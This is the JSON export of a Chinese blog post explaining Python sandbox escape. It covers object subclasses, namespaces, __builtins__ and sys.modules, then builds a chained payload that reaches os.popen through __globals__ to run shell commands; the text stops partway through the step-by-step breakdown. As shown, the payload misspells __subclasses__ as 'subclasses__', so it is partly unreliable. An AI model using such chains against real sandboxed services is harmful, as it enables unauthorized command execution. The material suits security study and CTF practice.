{"id":277,"date":"2025-11-09T10:17:58","date_gmt":"2025-11-09T10:17:58","guid":{"rendered":"http:\/\/101.42.175.115\/wordpress\/?p=277"},"modified":"2026-01-07T11:53:30","modified_gmt":"2026-01-07T11:53:30","slug":"py_rce","status":"publish","type":"post","link":"http:\/\/101.42.175.115\/wordpress\/?p=277","title":{"rendered":"Python\u4e2d\u7684\u6c99\u7bb1\u9003\u9038"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">python\u4e0b\u7684Rce\u73af\u5883<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">object\u7c7b<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728 python \u4e2d\uff0c\u6240\u6709\u7c7b\u7684\u9876\u5c42\u7236\u7c7b\u662f <strong>object<\/strong> \u7c7b\uff0c\u6240\u6709\u7c7b\u90fd\u76f4\u63a5\u6216\u95f4\u63a5\u5730\u7ee7\u627f\u4e8e object \u7c7b\u3002object \u7c7b\u63d0\u4f9b\u4e86\u8bb8\u591a\u57fa\u7840\u529f\u80fd\uff0c\u4f8b\u5982 <code>__class__<\/code>\u3001<code>__dir__<\/code>\u3001<code>__getattribute__<\/code> \u7b49\u5c5e\u6027\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">object \u4e0b\u6709\u5f88\u591a\u76f4\u63a5\u5b50\u7c7b\uff0c\u53ef\u4ee5\u901a\u8fc7 __subclasses__ \u7c7b\u65b9\u6cd5\u83b7\u53d6 object \u7684\u6240\u6709\u76f4\u63a5\u5b50\u7c7b\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" 
tabindex=\"-1\" aria-hidden=\"true\" readonly>print(object.__subclasses__())<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #998418\">print<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #998418\">object<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__subclasses__<\/span><span style=\"color: #999999\">())<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u547d\u540d\u7a7a\u95f4<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728 Python 
\u4e2d\uff0c<strong>\u547d\u540d\u7a7a\u95f4<\/strong>\uff08Namespace\uff09\u662f\u4e00\u4e2a\u7528\u4e8e\u5b58\u50a8\u6807\u8bc6\u7b26\uff08\u5982\u53d8\u91cf\u540d\u3001\u51fd\u6570\u540d\u3001\u7c7b\u540d\u7b49\uff09\u53ca\u5176\u5bf9\u5e94\u5bf9\u8c61\u7684\u5b57\u5178\u3002\u547d\u540d\u7a7a\u95f4\u7684\u4e3b\u8981\u4f5c\u7528\u662f\u7ba1\u7406\u548c\u7ef4\u62a4\u5bf9\u8c61\u7684\u53ef\u8bbf\u95ee\u6027\u548c\u751f\u547d\u5468\u671f\u3002\u6bcf\u4e2a\u547d\u540d\u7a7a\u95f4\u90fd\u5305\u542b\u4e86\u4e00\u4e9b\u540d\u5b57\u548c\u5b83\u4eec\u6240\u4ee3\u8868\u7684\u5bf9\u8c61\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u5185\u7f6e\u547d\u540d\u7a7a\u95f4<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u5185\u7f6e\u547d\u540d\u7a7a\u95f4<\/strong>\uff08Built-in Namespace\uff09\u662f\u4e00\u4e2a\u7279\u6b8a\u7684\u547d\u540d\u7a7a\u95f4\uff0c\u5305\u542b\u4e86\u6240\u6709 python \u5185\u7f6e\u7684\u5bf9\u8c61\u3001\u51fd\u6570\u7b49\u3002\u5b83\u662f\u5728 python \u89e3\u91ca\u5668\u542f\u52a8\u65f6\u81ea\u52a8\u52a0\u8f7d\u7684\uff0c\u5bf9\u4e8e\u6574\u4e2a python \u7a0b\u5e8f\u90fd\u662f\u53ef\u7528\u7684\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>builtins<\/strong> \u6a21\u5757\u5305\u542b\u4e86\u6240\u6709 python \u89e3\u91ca\u5668\u542f\u52a8\u65f6\u81ea\u52a8\u52a0\u8f7d\u7684\u5185\u7f6e\u5bf9\u8c61\uff0c\u5185\u7f6e\u547d\u540d\u7a7a\u95f4\u7684\u5185\u5bb9\u5c31\u662f builtins \u6a21\u5757\u4e2d\u7684\u5185\u5bb9\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>__builtins__<\/strong> \u662f\u6307\u5411<strong>\u5185\u7f6e\u547d\u540d\u7a7a\u95f4<\/strong>\u7684\u5f15\u7528\u3002<\/p>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u67e5\u770b\u5185\u7f6e\u51fd\u6570<\/strong><\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 
1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>print(__builtins__)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #998418\">print<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #998418\">__builtins__<\/span><span style=\"color: #999999\">)<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u901a\u8fc7 __builtins__ \u8c03\u7528\u5185\u7f6e\u51fd\u6570<\/strong><\/p>\n\n\n\n<div 
class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>__builtins__&#91;'print'&#93;(1)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">__builtins__<\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">print<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">&#93;(<\/span><span style=\"color: #2F798A\">1<\/span><span style=\"color: #999999\">)<\/span><\/span><\/code><\/pre><span 
style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">\u5168\u5c40\u547d\u540d\u7a7a\u95f4<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u5168\u5c40\u547d\u540d\u7a7a\u95f4<\/strong>\uff08Global Namespace\uff09\u662f\u6a21\u5757\u7ea7\u522b\u7684\u547d\u540d\u7a7a\u95f4\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>globals<\/strong> \u51fd\u6570\u53ef\u4ee5\u8bbf\u95ee\u5f53\u524d\u6a21\u5757\u7684\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u3002<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly># \u8bbf\u95ee\u5168\u5c40\u547d\u540d\u7a7a\u95f4\nprint(globals())<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" 
stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #A0ADA0\"># \u8bbf\u95ee\u5168\u5c40\u547d\u540d\u7a7a\u95f4<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">print<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #998418\">globals<\/span><span style=\"color: #999999\">())<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e86\u89e3\u4e86\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u7684\u6982\u5ff5\u540e\u6211\u4eec\u8fd8\u8981\u77e5\u9053 <strong>__globals__<\/strong>\u3002 \u6bcf\u4e2a\u51fd\u6570\u5728 python \u4e2d\u90fd\u6709\u4e00\u4e2a <strong>__globals__<\/strong> \u5c5e\u6027\uff0c\u5b83\u6307\u5411\u8be5\u51fd\u6570\u88ab\u5b9a\u4e49\u65f6\u6240\u5728\u6a21\u5757\u7684<strong>\u5168\u5c40\u547d\u540d\u7a7a\u95f4<\/strong>\u3002<\/p>\n\n\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">sys.modules<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>sys.modules<\/strong> \u662f\u4e00\u4e2a\u5b57\u5178\uff0c\u5b58\u50a8\u4e86 Python \u89e3\u91ca\u5668<strong>\u52a0\u8f7d\u7684\u6240\u6709\u6a21\u5757<\/strong>\uff0c\u5728 python \u542f\u52a8\u65f6\u9ed8\u8ba4\u542b\u6709\u4e00\u4e9b\u6a21\u5757\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u5728\u5199 python \u7a0b\u5e8f\u7684\u65f6\u5019\uff0cimport 
\u7684\u4f5c\u7528\u662f\u628a\u6a21\u5757\u52a0\u5165\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u3002import \u65f6\u4f1a\u5148\u68c0\u67e5 sys.modules\uff0csys.modules \u4e2d\u5df2\u6709\u7684\u6a21\u5757\u4ece sys.modules \u4e2d\u52a0\u8f7d\uff0c\u5426\u5219\u4ece\u6a21\u5757\u6587\u4ef6\u4e2d\u52a0\u8f7d\u3002<\/p>\n\n\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u52a8\u6001\u8bbf\u95ee<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728 python \u4e2d\u6709\u7740\u975e\u5e38\u4e30\u5bcc\u7684\u52a8\u6001\u8bbf\u95ee\u529f\u80fd\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>python \u5141\u8bb8\u901a\u8fc7\u70b9\uff08<code>.<\/code>\uff09\u64cd\u4f5c\u7b26\u8bbf\u95ee\u7c7b\u5bf9\u8c61\u3001\u5b9e\u4f8b\u5bf9\u8c61\u7684\u5c5e\u6027\u548c\u65b9\u6cd5\uff0c\u8c03\u7528\u6a21\u5757\u4e2d\u7684\u51fd\u6570\u3002<\/li>\n\n\n\n<li>object \u7c7b\u53ca\u5176\u5b50\u7c7b\u6709\u7740\u4e30\u5bcc\u7684\u5185\u7f6e\u65b9\u6cd5\u3002<\/li>\n<\/ol>\n\n\n\n<div style=\"height:44px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Rce\u7684\u5b9e\u73b0<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u6709\u4e86\u4e0a\u8ff0\u57fa\u7840\u77e5\u8bc6\u7684\u94fa\u57ab\u540e\uff0c\u6211\u4eec\u53ef\u4ee5\u8f7b\u677e\u5730\u7406\u89e3\u4e00\u4e9b python \u4e2d\u7684 Rce \u59ff\u52bf\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5173\u952e\u8bcd\u8fc7\u6ee4<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u901a\u8fc7 eval \u548c exec \u8fd9\u4e24\u4e2a\u4ee3\u7801\u6267\u884c\u51fd\u6570\u7ed5\u8fc7\uff0c\u56e0\u4e3a\u5728\u8fd9\u4e24\u4e2a\u51fd\u6570\u4e2d\u7cfb\u7edf\u547d\u4ee4\u8bed\u53e5\u4f5c\u4e3a\u5b57\u7b26\u4e32\u5448\u73b0\uff0c\u800c\u5b57\u7b26\u4e32\u672c\u8eab\u6709\u7740\u975e\u5e38\u591a\u7684\u62fc\u63a5\u548c\u7f16\u7801\u65b9\u5f0f\u3002<\/p>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" 
class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u73af\u5883\u8fc7\u6ee4<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u8fc7\u6ee4<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u76f4\u63a5\u4ece\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u4e0a\u8fdb\u884c\u8fc7\u6ee4\uff0c\u4f8b\u5982\u65e0\u6cd5\u4f7f\u7528\u5185\u7f6e\u51fd\u6570\uff0c\u8fd9\u65f6\u5019\u53ef\u4ee5\u901a\u8fc7\u94fe\u5f0f\u8bbf\u95ee\u6765\u8fdb\u884c Rce\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u77e5\u9053\u5728 python \u89e3\u91ca\u5668\u542f\u52a8\u7684\u65f6\u5019\u9ed8\u8ba4\u4f1a\u52a0\u8f7d\u4e00\u4e9b\u6a21\u5757\uff0c\u50a8\u5b58\u5728 sys.modules \u4e2d\u3002\u5982\u679c\u6211\u4eec\u80fd\u901a\u8fc7\u67d0\u79cd\u65b9\u5f0f\u62ff\u5230\u8fd9\u4e9b\u5df2\u7ecf\u52a0\u8f7d\u7684\u6a21\u5757\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u4e2d\u7684\u7cfb\u7edf\u547d\u4ee4\u6267\u884c\u51fd\u6570\uff0c\u5c31\u80fd\u5b9e\u73b0 Rce \u4e86\u3002\u800c python \u4e2d\u4e30\u5bcc\u7684\u52a8\u6001\u8bbf\u95ee\u529f\u80fd\u63d0\u4f9b\u4e86\u5b9e\u73b0\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u62ff\u4e00\u4e2a payload \u6765\u4e3e\u4f8b\u8bf4\u660e\u3002<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea 
class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>\"\".__class__.__base__.subclasses__()&#91;\u4e0b\u6807&#93;.__init__.__globals__&#91;'popen'&#93;('ls').read()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #B5695999\">&quot;&quot;<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__class__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">__base__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">subclasses__<\/span><span style=\"color: #999999\">()&#91;<\/span><span style=\"color: #393A34\">\u4e0b\u6807<\/span><span style=\"color: #999999\">&#93;.<\/span><span style=\"color: #998418\">__init__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__globals__<\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">popen<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">&#93;(<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">ls<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">).<\/span><span style=\"color: #393A34\">read<\/span><span 
style=\"color: #999999\">()<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u9996\u5148\u6211\u4eec\u62ff\u5230 object \u57fa\u7c7b\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>\"\".__class__.__base__<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: 
#B5695999\">&quot;&quot;<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__class__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">__base__<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u7531\u6b64\u83b7\u53d6\u8be5\u73af\u5883\u4e2d\u6240\u6709\u7684\u5b50\u7c7b\uff08\u5305\u62ec\u5728 sys.modules \u4e2d\u521d\u59cb\u5316\u65f6\u52a0\u8f7d\u7684\u7c7b\uff09\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>\"\".__class__.__base__.subclasses__()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 
16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #B5695999\">&quot;&quot;<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__class__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">__base__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">subclasses__<\/span><span style=\"color: #999999\">()<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u7684\u76ee\u6807\u662f\u62ff\u5230\u67d0\u4e2a\u6a21\u5757\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u4e2d\u7684\u7cfb\u7edf\u547d\u4ee4\u6267\u884c\u51fd\u6570\uff0c\u6240\u4ee5\u9996\u5148\u8981\u627e\u5230\u6ee1\u8db3\u8fd9\u4e2a\u6761\u4ef6\u7684\u7279\u5b9a\u5b50\u7c7b\u3002<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 